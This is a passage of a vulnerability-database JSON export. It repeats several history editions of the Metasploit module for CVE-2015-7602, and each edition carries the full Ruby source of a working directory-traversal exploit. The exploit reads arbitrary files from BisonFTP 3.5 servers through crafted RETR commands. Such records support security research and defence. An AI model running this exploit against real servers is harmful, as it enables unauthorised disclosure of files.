"metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-09T17:03:32", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-09T19:01:19", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-09T19:01:19", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-11T01:04:59", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-11T01:04:59", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-11T05:04:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-11T05:04:18", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-29T23:50:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-29T23:50:53", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-30T01:47:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-30T01:47:53", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-06-04T13:48:05", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-06-04T13:48:05", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-06-04T15:50:02", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read 